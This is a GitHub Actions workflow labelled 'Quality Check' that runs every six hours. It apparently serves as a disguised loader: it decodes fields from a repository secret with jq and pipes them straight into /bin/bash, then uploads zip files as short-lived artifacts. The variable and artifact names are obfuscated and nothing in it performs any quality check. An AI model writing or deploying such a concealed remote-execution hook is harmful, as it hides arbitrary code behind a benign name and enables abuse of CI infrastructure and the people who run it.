name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '39 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  compile:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Setup and run
        env:
          cz960: ${{ secrets.cz960 }}
        run: |
          printf '%s' "$cz960" | jq -r .met95062 | /bin/bash
          printf '%s' "$m283" | jq -r .arlfj79058 | /bin/bash
          printf '%s' "$sa6" | jq -r .fex6733 | /bin/bash
          printf '%s' "$a90" | jq -r .yd36354 | /bin/bash
          printf '%s' "$d1146" | jq -r .rlng137 | /bin/bash
          echo $w488 | jq -r .qotyc7824 | /bin/bash

      - name: Upload data
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: oyxuC0at
          path: "*.zip"
          retention-days: 1
